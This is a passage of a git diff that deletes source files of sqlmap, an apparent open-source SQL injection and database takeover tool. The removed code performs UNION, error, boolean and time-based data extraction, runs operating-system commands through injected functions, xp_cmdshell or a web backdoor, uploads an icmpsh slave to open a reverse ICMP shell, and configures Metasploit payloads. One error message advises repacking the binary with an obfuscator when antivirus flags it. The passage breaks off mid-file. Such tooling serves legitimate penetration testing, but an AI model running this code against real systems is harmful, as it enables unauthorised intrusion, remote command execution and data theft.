" - warnMsg += "sqlmap will assume that it returns only " - warnMsg += "one entry" - logger.warn(warnMsg) - - stopLimit = 1 - - elif (not count or int(count) == 0): - if not count: - warnMsg = "the SQL query provided does not " - warnMsg += "return any output" - logger.warn(warnMsg) - - return None - - elif (not stopLimit or stopLimit == 0): - return None - - try: - try: - for num in xrange(startLimit, stopLimit): - output = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, num=num, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) - outputs.append(output) - except OverflowError: - errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) - errMsg += "with switch '--fresh-queries'" - raise SqlmapDataException(errMsg) - - except KeyboardInterrupt: - print - warnMsg = "user aborted during dumping phase" - logger.warn(warnMsg) - - return outputs - - elif Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().startswith("SELECT ") and " FROM " not in expression.upper(): - expression += FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()] - - outputs = _goInferenceFields(expression, expressionFields, expressionFieldsList, payload, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar, dump=dump) - - return ", ".join(output for output in outputs) if not isNoneValue(outputs) else None - -def _goBooleanProxy(expression): - """ - Retrieve the output of a boolean based SQL query - """ - - initTechnique(kb.technique) - - if conf.dnsName: - query = agent.prefixQuery(kb.injection.data[kb.technique].vector) - query = agent.suffixQuery(query) - payload = agent.payload(newValue=query) - output = _goDns(payload, expression) - - if output is not None: - return output - - vector = kb.injection.data[kb.technique].vector - vector = vector.replace("[INFERENCE]", expression) - query = agent.prefixQuery(vector) - query = agent.suffixQuery(query) - payload = 
agent.payload(newValue=query) - - timeBasedCompare = kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) - - output = hashDBRetrieve(expression, checkConf=True) - - if output is None: - output = Request.queryPage(payload, timeBasedCompare=timeBasedCompare, raise404=False) - - if output is not None: - hashDBWrite(expression, output) - - return output - -def _goUnion(expression, unpack=True, dump=False): - """ - Retrieve the output of a SQL query taking advantage of an union SQL - injection vulnerability on the affected parameter. - """ - - output = unionUse(expression, unpack=unpack, dump=dump) - - if isinstance(output, basestring): - output = parseUnionPage(output) - - return output - -def getValue(expression, blind=True, union=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True): - """ - Called each time sqlmap inject a SQL query on the SQL injection - affected parameter. 
- """ - - if conf.hexConvert: - charsetType = CHARSET_TYPE.HEXADECIMAL - - kb.safeCharEncode = safeCharEncode - kb.resumeValues = resumeValue - - if suppressOutput is not None: - pushValue(getCurrentThreadData().disableStdOut) - getCurrentThreadData().disableStdOut = suppressOutput - - try: - pushValue(conf.db) - pushValue(conf.tbl) - - if expected == EXPECTED.BOOL: - forgeCaseExpression = booleanExpression = expression - - if expression.upper().startswith("SELECT "): - booleanExpression = "(%s)=%s" % (booleanExpression, "'1'" if "'1'" in booleanExpression else "1") - else: - forgeCaseExpression = agent.forgeCaseStatement(expression) - - if conf.direct: - value = direct(forgeCaseExpression if expected == EXPECTED.BOOL else expression) - - elif any(map(isTechniqueAvailable, getPublicTypeMembers(PAYLOAD.TECHNIQUE, onlyValues=True))): - query = cleanQuery(expression) - query = expandAsteriskForColumns(query) - value = None - found = False - count = 0 - - if query and not re.search(r"COUNT.*FROM.*\(.*DISTINCT", query, re.I): - query = query.replace("DISTINCT ", "") - - if not conf.forceDns: - if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): - kb.technique = PAYLOAD.TECHNIQUE.UNION - kb.forcePartialUnion = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector[8] - fallback = not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion - - try: - value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump) - except SqlmapConnectionException: - if not fallback: - raise - - count += 1 - found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE - - if not found and fallback: - warnMsg = "something went wrong with full UNION " - warnMsg += "technique (could be because of " - warnMsg += "limitation on retrieved number of entries)" - if " FROM " in query.upper(): - warnMsg += ". 
Falling back to partial UNION technique" - singleTimeWarnMessage(warnMsg) - - try: - pushValue(kb.forcePartialUnion) - kb.forcePartialUnion = True - value = _goUnion(query, unpack, dump) - found = (value is not None) or (value is None and expectingNone) - finally: - kb.forcePartialUnion = popValue() - else: - singleTimeWarnMessage(warnMsg) - - if error and any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) and not found: - kb.technique = PAYLOAD.TECHNIQUE.ERROR if isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) else PAYLOAD.TECHNIQUE.QUERY - value = errorUse(forgeCaseExpression if expected == EXPECTED.BOOL else query, dump) - count += 1 - found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE - - if found and conf.dnsName: - _ = "".join(filter(None, (key if isTechniqueAvailable(value) else None for key, value in {"E": PAYLOAD.TECHNIQUE.ERROR, "Q": PAYLOAD.TECHNIQUE.QUERY, "U": PAYLOAD.TECHNIQUE.UNION}.items()))) - warnMsg = "option '--dns-domain' will be ignored " - warnMsg += "as faster techniques are usable " - warnMsg += "(%s) " % _ - singleTimeWarnMessage(warnMsg) - - if blind and isTechniqueAvailable(PAYLOAD.TECHNIQUE.BOOLEAN) and not found: - kb.technique = PAYLOAD.TECHNIQUE.BOOLEAN - - if expected == EXPECTED.BOOL: - value = _goBooleanProxy(booleanExpression) - else: - value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump) - - count += 1 - found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE - - if time and (isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME) or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED)) and not found: - kb.responseTimeMode = re.sub(r"(?i)[^a-z]", "", re.sub(r"'[^']+'", "", expression)) if re.search(r"(?i)SELECT.+FROM", expression) else None - - if isTechniqueAvailable(PAYLOAD.TECHNIQUE.TIME): - kb.technique = PAYLOAD.TECHNIQUE.TIME - else: - kb.technique = 
PAYLOAD.TECHNIQUE.STACKED - - if expected == EXPECTED.BOOL: - value = _goBooleanProxy(booleanExpression) - else: - value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump) - else: - errMsg = "none of the injection types identified can be " - errMsg += "leveraged to retrieve queries output" - raise SqlmapNotVulnerableException(errMsg) - - finally: - kb.resumeValues = True - kb.responseTimeMode = None - - conf.tbl = popValue() - conf.db = popValue() - - if suppressOutput is not None: - getCurrentThreadData().disableStdOut = popValue() - - kb.safeCharEncode = False - - if not any((kb.testMode, conf.dummy, conf.offline)) and value is None and Backend.getDbms() and conf.dbmsHandler and not conf.noCast and not conf.hexConvert: - warnMsg = "in case of continuous data retrieval problems you are advised to try " - warnMsg += "a switch '--no-cast' " - warnMsg += "or switch '--hex'" if Backend.getIdentifiedDbms() not in (DBMS.ACCESS, DBMS.FIREBIRD) else "" - singleTimeWarnMessage(warnMsg) - - return extractExpectedValue(value, expected) - -def goStacked(expression, silent=False): - if PAYLOAD.TECHNIQUE.STACKED in kb.injection.data: - kb.technique = PAYLOAD.TECHNIQUE.STACKED - else: - for technique in getPublicTypeMembers(PAYLOAD.TECHNIQUE, True): - _ = getTechniqueData(technique) - if _ and "stacked" in _["title"].lower(): - kb.technique = technique - break - - expression = cleanQuery(expression) - - if conf.direct: - return direct(expression) - - query = agent.prefixQuery(";%s" % expression) - query = agent.suffixQuery(query) - payload = agent.payload(newValue=query) - Request.queryPage(payload, content=False, silent=silent, noteResponseTime=False, timeBasedCompare="SELECT" in (payload or "").upper()) - -def checkBooleanExpression(expression, expectingNone=True): - return getValue(expression, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY, suppressOutput=True, expectingNone=expectingNone) diff --git 
a/lib/request/methodrequest.py b/lib/request/methodrequest.py deleted file mode 100644 index 8e9d17d1..00000000 --- a/lib/request/methodrequest.py +++ /dev/null @@ -1,19 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import urllib2 - -class MethodRequest(urllib2.Request): - """ - Used to create HEAD/PUT/DELETE/... requests with urllib2 - """ - - def set_method(self, method): - self.method = method.upper() - - def get_method(self): - return getattr(self, 'method', urllib2.Request.get_method(self)) diff --git a/lib/request/pkihandler.py b/lib/request/pkihandler.py deleted file mode 100644 index eeaa862b..00000000 --- a/lib/request/pkihandler.py +++ /dev/null @@ -1,23 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import httplib -import urllib2 - -from lib.core.data import conf - -class HTTPSPKIAuthHandler(urllib2.HTTPSHandler): - def __init__(self, auth_file): - urllib2.HTTPSHandler.__init__(self) - self.auth_file = auth_file - - def https_open(self, req): - return self.do_open(self.getConnection, req) - - def getConnection(self, host, timeout=None): - # Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain - return httplib.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout) diff --git a/lib/request/rangehandler.py b/lib/request/rangehandler.py deleted file mode 100644 index e4171031..00000000 --- a/lib/request/rangehandler.py +++ /dev/null @@ -1,50 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import urllib -import urllib2 - -from lib.core.exception import SqlmapConnectionException - -class HTTPRangeHandler(urllib2.BaseHandler): - """ - Handler that enables 
HTTP Range headers. - - Reference: http://stackoverflow.com/questions/1971240/python-seek-on-remote-file - - This was extremely simple. The Range header is a HTTP feature to - begin with so all this class does is tell urllib2 that the - "206 Partial Content" response from the HTTP server is what we - expected. - - Example: - import urllib2 - import byterange - - range_handler = range.HTTPRangeHandler() - opener = urllib2.build_opener(range_handler) - - # install it - urllib2.install_opener(opener) - - # create Request and set Range header - req = urllib2.Request('http://www.python.org/') - req.header['Range'] = 'bytes=30-50' - f = urllib2.urlopen(req) - """ - - def http_error_206(self, req, fp, code, msg, hdrs): - # 206 Partial Content Response - r = urllib.addinfourl(fp, hdrs, req.get_full_url()) - r.code = code - r.msg = msg - return r - - def http_error_416(self, req, fp, code, msg, hdrs): - # HTTP's Range Not Satisfiable error - errMsg = "Invalid range" - raise SqlmapConnectionException(errMsg) diff --git a/lib/request/redirecthandler.py b/lib/request/redirecthandler.py deleted file mode 100644 index 3eba5260..00000000 --- a/lib/request/redirecthandler.py +++ /dev/null @@ -1,169 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import types -import urllib2 -import urlparse - -from StringIO import StringIO - -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.common import getHostHeader -from lib.core.common import getUnicode -from lib.core.common import logHTTPTraffic -from lib.core.common import readInput -from lib.core.enums import CUSTOM_LOGGING -from lib.core.enums import HTTP_HEADER -from lib.core.enums import HTTPMETHOD -from lib.core.enums import REDIRECTION -from lib.core.exception import SqlmapConnectionException -from lib.core.settings import DEFAULT_COOKIE_DELIMITER -from 
lib.core.settings import MAX_CONNECTION_CHUNK_SIZE -from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE -from lib.core.settings import MAX_SINGLE_URL_REDIRECTIONS -from lib.core.settings import MAX_TOTAL_REDIRECTIONS -from lib.core.threads import getCurrentThreadData -from lib.request.basic import decodePage -from lib.request.basic import parseResponse - -class SmartRedirectHandler(urllib2.HTTPRedirectHandler): - def _get_header_redirect(self, headers): - retVal = None - - if headers: - if "location" in headers: - retVal = headers.getheaders("location")[0] - elif "uri" in headers: - retVal = headers.getheaders("uri")[0] - - return retVal - - def _ask_redirect_choice(self, redcode, redurl, method): - with kb.locks.redirect: - if kb.redirectChoice is None: - msg = "sqlmap got a %d redirect to " % redcode - msg += "'%s'. Do you want to follow? [Y/n] " % redurl - choice = readInput(msg, default="Y") - - kb.redirectChoice = choice.upper() - - if kb.redirectChoice == REDIRECTION.YES and method == HTTPMETHOD.POST and kb.resendPostOnRedirect is None: - msg = "redirect is a result of a " - msg += "POST request. Do you want to " - msg += "resend original POST data to a new " - msg += "location? 
[%s] " % ("Y/n" if not kb.originalPage else "y/N") - choice = readInput(msg, default=("Y" if not kb.originalPage else "N")) - - kb.resendPostOnRedirect = choice.upper() == 'Y' - - if kb.resendPostOnRedirect: - self.redirect_request = self._redirect_request - - def _redirect_request(self, req, fp, code, msg, headers, newurl): - newurl = newurl.replace(' ', '%20') - return urllib2.Request(newurl, data=req.data, headers=req.headers, origin_req_host=req.get_origin_req_host()) - - def http_error_302(self, req, fp, code, msg, headers): - content = None - redurl = self._get_header_redirect(headers) - - try: - content = fp.read(MAX_CONNECTION_TOTAL_SIZE) - except Exception, msg: - dbgMsg = "there was a problem while retrieving " - dbgMsg += "redirect response content (%s)" % msg - logger.debug(dbgMsg) - finally: - if content: - try: # try to write it back to the read buffer so we could reuse it in further steps - fp.fp._rbuf.truncate(0) - fp.fp._rbuf.write(content) - except: - pass - - content = decodePage(content, headers.get(HTTP_HEADER.CONTENT_ENCODING), headers.get(HTTP_HEADER.CONTENT_TYPE)) - - threadData = getCurrentThreadData() - threadData.lastRedirectMsg = (threadData.lastRequestUID, content) - - redirectMsg = "HTTP redirect " - redirectMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, getUnicode(msg)) - - if headers: - logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in headers.items()) - else: - logHeaders = "" - - redirectMsg += logHeaders - if content: - redirectMsg += "\n\n%s" % getUnicode(content[:MAX_CONNECTION_CHUNK_SIZE]) - - logHTTPTraffic(threadData.lastRequestMsg, redirectMsg) - logger.log(CUSTOM_LOGGING.TRAFFIC_IN, redirectMsg) - - if redurl: - try: - if not urlparse.urlsplit(redurl).netloc: - redurl = urlparse.urljoin(req.get_full_url(), redurl) - - self._infinite_loop_check(req) - self._ask_redirect_choice(code, redurl, req.get_method()) - except 
ValueError: - redurl = None - result = fp - - if redurl and kb.redirectChoice == REDIRECTION.YES: - parseResponse(content, headers) - - req.headers[HTTP_HEADER.HOST] = getHostHeader(redurl) - if headers and HTTP_HEADER.SET_COOKIE in headers: - req.headers[HTTP_HEADER.COOKIE] = headers[HTTP_HEADER.SET_COOKIE].split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)[0] - try: - result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers) - except urllib2.HTTPError, e: - result = e - - # Dirty hack for http://bugs.python.org/issue15701 - try: - result.info() - except AttributeError: - def _(self): - return getattr(self, "hdrs") or {} - result.info = types.MethodType(_, result) - - if not hasattr(result, "read"): - def _(self, length=None): - return e.msg - result.read = types.MethodType(_, result) - - if not getattr(result, "url", None): - result.url = redurl - - if not getattr(result, "code", None): - result.code = 999 - except: - redurl = None - result = fp - fp.read = StringIO("").read - else: - result = fp - - threadData.lastRedirectURL = (threadData.lastRequestUID, redurl) - - result.redcode = code - result.redurl = redurl - return result - - http_error_301 = http_error_303 = http_error_307 = http_error_302 - - def _infinite_loop_check(self, req): - if hasattr(req, 'redirect_dict') and (req.redirect_dict.get(req.get_full_url(), 0) >= MAX_SINGLE_URL_REDIRECTIONS or len(req.redirect_dict) >= MAX_TOTAL_REDIRECTIONS): - errMsg = "infinite redirect loop detected (%s). 
" % ", ".join(item for item in req.redirect_dict.keys()) - errMsg += "Please check all provided parameters and/or provide missing ones" - raise SqlmapConnectionException(errMsg) diff --git a/lib/request/templates.py b/lib/request/templates.py deleted file mode 100644 index 2cda182f..00000000 --- a/lib/request/templates.py +++ /dev/null @@ -1,22 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.data import kb -from lib.request.connect import Connect as Request - -def getPageTemplate(payload, place): - retVal = (kb.originalPage, kb.errorIsNone) - - if payload and place: - if (payload, place) not in kb.pageTemplates: - page, _ = Request.queryPage(payload, place, content=True, raise404=False) - kb.pageTemplates[(payload, place)] = (page, kb.lastParserStatus is None) - - retVal = kb.pageTemplates[(payload, place)] - - return retVal - diff --git a/lib/takeover/__init__.py b/lib/takeover/__init__.py deleted file mode 100644 index c2e45792..00000000 --- a/lib/takeover/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py deleted file mode 100644 index fcfd1f34..00000000 --- a/lib/takeover/abstraction.py +++ /dev/null @@ -1,216 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import sys - -from extra.safe2bin.safe2bin import safechardecode -from lib.core.common import dataToStdout -from lib.core.common import Backend -from lib.core.common import getSQLSnippet -from lib.core.common import getUnicode -from lib.core.common import isStackingAvailable -from lib.core.common import readInput -from lib.core.data import conf -from 
lib.core.data import logger -from lib.core.enums import AUTOCOMPLETE_TYPE -from lib.core.enums import DBMS -from lib.core.enums import OS -from lib.core.exception import SqlmapFilePathException -from lib.core.exception import SqlmapUnsupportedFeatureException -from lib.core.shell import autoCompletion -from lib.request import inject -from lib.takeover.udf import UDF -from lib.takeover.web import Web -from lib.takeover.xp_cmdshell import Xp_cmdshell - - -class Abstraction(Web, UDF, Xp_cmdshell): - """ - This class defines an abstraction layer for OS takeover functionalities - to UDF / Xp_cmdshell objects - """ - - def __init__(self): - self.envInitialized = False - self.alwaysRetrieveCmdOutput = False - - UDF.__init__(self) - Web.__init__(self) - Xp_cmdshell.__init__(self) - - def execCmd(self, cmd, silent=False): - if self.webBackdoorUrl and not isStackingAvailable(): - self.webBackdoorRunCmd(cmd) - - elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): - self.udfExecCmd(cmd, silent=silent) - - elif Backend.isDbms(DBMS.MSSQL): - self.xpCmdshellExecCmd(cmd, silent=silent) - - else: - errMsg = "Feature not yet implemented for the back-end DBMS" - raise SqlmapUnsupportedFeatureException(errMsg) - - def evalCmd(self, cmd, first=None, last=None): - retVal = None - - if self.webBackdoorUrl and not isStackingAvailable(): - retVal = self.webBackdoorRunCmd(cmd) - - elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): - retVal = self.udfEvalCmd(cmd, first, last) - - elif Backend.isDbms(DBMS.MSSQL): - retVal = self.xpCmdshellEvalCmd(cmd, first, last) - - else: - errMsg = "Feature not yet implemented for the back-end DBMS" - raise SqlmapUnsupportedFeatureException(errMsg) - - return safechardecode(retVal) - - def runCmd(self, cmd): - getOutput = None - - if not self.alwaysRetrieveCmdOutput: - message = "do you want to retrieve the command standard " - message += "output? 
[Y/n/a] " - getOutput = readInput(message, default="Y") - - if getOutput in ("a", "A"): - self.alwaysRetrieveCmdOutput = True - - if not getOutput or getOutput in ("y", "Y") or self.alwaysRetrieveCmdOutput: - output = self.evalCmd(cmd) - - if output: - conf.dumper.string("command standard output", output) - else: - dataToStdout("No output\n") - else: - self.execCmd(cmd) - - def shell(self): - if self.webBackdoorUrl and not isStackingAvailable(): - infoMsg = "calling OS shell. To quit type " - infoMsg += "'x' or 'q' and press ENTER" - logger.info(infoMsg) - - else: - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): - infoMsg = "going to use injected sys_eval and sys_exec " - infoMsg += "user-defined functions for operating system " - infoMsg += "command execution" - logger.info(infoMsg) - - elif Backend.isDbms(DBMS.MSSQL): - infoMsg = "going to use xp_cmdshell extended procedure for " - infoMsg += "operating system command execution" - logger.info(infoMsg) - - else: - errMsg = "feature not yet implemented for the back-end DBMS" - raise SqlmapUnsupportedFeatureException(errMsg) - - infoMsg = "calling %s OS shell. To quit type " % (Backend.getOs() or "Windows") - infoMsg += "'x' or 'q' and press ENTER" - logger.info(infoMsg) - - autoCompletion(AUTOCOMPLETE_TYPE.OS, OS.WINDOWS if Backend.isOs(OS.WINDOWS) else OS.LINUX) - - while True: - command = None - - try: - command = raw_input("os-shell> ") - command = getUnicode(command, encoding=sys.stdin.encoding) - except KeyboardInterrupt: - print - errMsg = "user aborted" - logger.error(errMsg) - except EOFError: - print - errMsg = "exit" - logger.error(errMsg) - break - - if not command: - continue - - if command.lower() in ("x", "q", "exit", "quit"): - break - - self.runCmd(command) - - def _initRunAs(self): - if not conf.dbmsCred: - return - - if not conf.direct and not isStackingAvailable(): - errMsg = "stacked queries are not supported hence sqlmap cannot " - errMsg += "execute statements as another user. 
The execution " - errMsg += "will continue and the DBMS credentials provided " - errMsg += "will simply be ignored" - logger.error(errMsg) - - return - - if Backend.isDbms(DBMS.MSSQL): - msg = "on Microsoft SQL Server 2005 and 2008, OPENROWSET function " - msg += "is disabled by default. This function is needed to execute " - msg += "statements as another DBMS user since you provided the " - msg += "option '--dbms-creds'. If you are DBA, you can enable it. " - msg += "Do you want to enable it? [Y/n] " - choice = readInput(msg, default="Y") - - if not choice or choice in ("y", "Y"): - expression = getSQLSnippet(DBMS.MSSQL, "configure_openrowset", ENABLE="1") - inject.goStacked(expression) - - # TODO: add support for PostgreSQL - #elif Backend.isDbms(DBMS.PGSQL): - # expression = getSQLSnippet(DBMS.PGSQL, "configure_dblink", ENABLE="1") - # inject.goStacked(expression) - - def initEnv(self, mandatory=True, detailed=False, web=False, forceInit=False): - self._initRunAs() - - if self.envInitialized and not forceInit: - return - - if web: - self.webInit() - else: - self.checkDbmsOs(detailed) - - if mandatory and not self.isDba(): - warnMsg = "functionality requested probably does not work because " - warnMsg += "the curent session user is not a database administrator" - - if not conf.dbmsCred and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL): - warnMsg += ". 
You can try to use option '--dbms-cred' " - warnMsg += "to execute statements as a DBA user if you " - warnMsg += "were able to extract and crack a DBA " - warnMsg += "password by any mean" - - logger.warn(warnMsg) - - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): - success = self.udfInjectSys() - - if success is not True: - msg = "unable to mount the operating system takeover" - raise SqlmapFilePathException(msg) - elif Backend.isDbms(DBMS.MSSQL): - if mandatory: - self.xpCmdshellInit() - else: - errMsg = "feature not yet implemented for the back-end DBMS" - raise SqlmapUnsupportedFeatureException(errMsg) - - self.envInitialized = True diff --git a/lib/takeover/icmpsh.py b/lib/takeover/icmpsh.py deleted file mode 100644 index babfcc1a..00000000 --- a/lib/takeover/icmpsh.py +++ /dev/null @@ -1,124 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import time - -from extra.icmpsh.icmpsh_m import main as icmpshmaster -from lib.core.common import getLocalIP -from lib.core.common import getRemoteIP -from lib.core.common import normalizePath -from lib.core.common import ntToPosixSlashes -from lib.core.common import randomStr -from lib.core.common import readInput -from lib.core.data import conf -from lib.core.data import logger -from lib.core.data import paths -from lib.core.exception import SqlmapDataException - -class ICMPsh: - """ - This class defines methods to call icmpsh for plugins. - """ - - def _initVars(self): - self.lhostStr = None - self.rhostStr = None - self.localIP = getLocalIP() - self.remoteIP = getRemoteIP() or conf.hostname - self._icmpslave = normalizePath(os.path.join(paths.SQLMAP_EXTRAS_PATH, "icmpsh", "icmpsh.exe_")) - - def _selectRhost(self): - address = None - message = "what is the back-end DBMS address? 
" - - if self.remoteIP: - message += "[Enter for '%s' (detected)] " % self.remoteIP - - while not address: - address = readInput(message, default=self.remoteIP) - - if conf.batch and not address: - raise SqlmapDataException("remote host address is missing") - - return address - - def _selectLhost(self): - address = None - message = "what is the local address? " - - if self.localIP: - message += "[Enter for '%s' (detected)] " % self.localIP - - while not address: - address = readInput(message, default=self.localIP) - - if conf.batch and not address: - raise SqlmapDataException("local host address is missing") - - return address - - def _prepareIngredients(self, encode=True): - self.lhostStr = ICMPsh._selectLhost(self) - self.rhostStr = ICMPsh._selectRhost(self) - - def _runIcmpshMaster(self): - infoMsg = "running icmpsh master locally" - logger.info(infoMsg) - - icmpshmaster(self.lhostStr, self.rhostStr) - - def _runIcmpshSlaveRemote(self): - infoMsg = "running icmpsh slave remotely" - logger.info(infoMsg) - - cmd = "%s -t %s -d 500 -b 30 -s 128 &" % (self._icmpslaveRemote, self.lhostStr) - - self.execCmd(cmd, silent=True) - - def uploadIcmpshSlave(self, web=False): - ICMPsh._initVars(self) - self._randStr = randomStr(lowercase=True) - self._icmpslaveRemoteBase = "tmpi%s.exe" % self._randStr - - self._icmpslaveRemote = "%s/%s" % (conf.tmpPath, self._icmpslaveRemoteBase) - self._icmpslaveRemote = ntToPosixSlashes(normalizePath(self._icmpslaveRemote)) - - logger.info("uploading icmpsh slave to '%s'" % self._icmpslaveRemote) - - if web: - written = self.webUpload(self._icmpslaveRemote, os.path.split(self._icmpslaveRemote)[0], filepath=self._icmpslave) - else: - written = self.writeFile(self._icmpslave, self._icmpslaveRemote, "binary", forceCheck=True) - - if written is not True: - errMsg = "there has been a problem uploading icmpsh, it " - errMsg += "looks like the binary file has not been written " - errMsg += "on the database underlying file system or an AV has " - 
errMsg += "flagged it as malicious and removed it. In such a case " - errMsg += "it is recommended to recompile icmpsh with slight " - errMsg += "modification to the source code or pack it with an " - errMsg += "obfuscator software" - logger.error(errMsg) - - return False - else: - logger.info("icmpsh successfully uploaded") - return True - - def icmpPwn(self): - ICMPsh._prepareIngredients(self) - self._runIcmpshSlaveRemote() - self._runIcmpshMaster() - - debugMsg = "icmpsh master exited" - logger.debug(debugMsg) - - time.sleep(1) - self.execCmd("taskkill /F /IM %s" % self._icmpslaveRemoteBase, silent=True) - time.sleep(1) - self.delRemoteFile(self._icmpslaveRemote) diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py deleted file mode 100644 index 84540583..00000000 --- a/lib/takeover/metasploit.py +++ /dev/null @@ -1,729 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re -import sys -import tempfile -import time - -from subprocess import PIPE - -from extra.cloak.cloak import cloak -from extra.cloak.cloak import decloak -from lib.core.common import dataToStdout -from lib.core.common import Backend -from lib.core.common import getLocalIP -from lib.core.common import getRemoteIP -from lib.core.common import getUnicode -from lib.core.common import normalizePath -from lib.core.common import ntToPosixSlashes -from lib.core.common import pollProcess -from lib.core.common import randomRange -from lib.core.common import randomStr -from lib.core.common import readInput -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import paths -from lib.core.enums import DBMS -from lib.core.enums import OS -from lib.core.exception import SqlmapDataException -from lib.core.exception import SqlmapFilePathException -from lib.core.exception import SqlmapGenericException -from 
lib.core.settings import IS_WIN -from lib.core.settings import METASPLOIT_SESSION_TIMEOUT -from lib.core.settings import SHELLCODEEXEC_RANDOM_STRING_MARKER -from lib.core.settings import UNICODE_ENCODING -from lib.core.subprocessng import blockingReadFromFD -from lib.core.subprocessng import blockingWriteToFD -from lib.core.subprocessng import Popen as execute -from lib.core.subprocessng import send_all -from lib.core.subprocessng import recv_some - -if IS_WIN: - import msvcrt -else: - from select import select - -class Metasploit: - """ - This class defines methods to call Metasploit for plugins. - """ - - def _initVars(self): - self.connectionStr = None - self.lhostStr = None - self.rhostStr = None - self.portStr = None - self.payloadStr = None - self.encoderStr = None - self.payloadConnStr = None - self.localIP = getLocalIP() - self.remoteIP = getRemoteIP() or conf.hostname - self._msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli")) - self._msfConsole = normalizePath(os.path.join(conf.msfPath, "msfconsole")) - self._msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode")) - self._msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload")) - self._msfVenom = normalizePath(os.path.join(conf.msfPath, "msfvenom")) - - if IS_WIN: - _ = conf.msfPath - while _: - if os.path.exists(os.path.join(_, "scripts")): - _ = os.path.join(_, "scripts", "setenv.bat") - break - else: - old = _ - _ = normalizePath(os.path.join(_, "..")) - if _ == old: - break - self._msfCli = "%s & ruby %s" % (_, self._msfCli) - self._msfConsole = "%s & ruby %s" % (_, self._msfConsole) - self._msfEncode = "ruby %s" % self._msfEncode - self._msfPayload = "%s & ruby %s" % (_, self._msfPayload) - self._msfVenom = "%s & ruby %s" % (_, self._msfVenom) - - self._msfPayloadsList = { - "windows": { - 1: ("Meterpreter (default)", "windows/meterpreter"), - 2: ("Shell", "windows/shell"), - 3: ("VNC", "windows/vncinject"), - }, - "linux": { - 1: ("Shell (default)", 
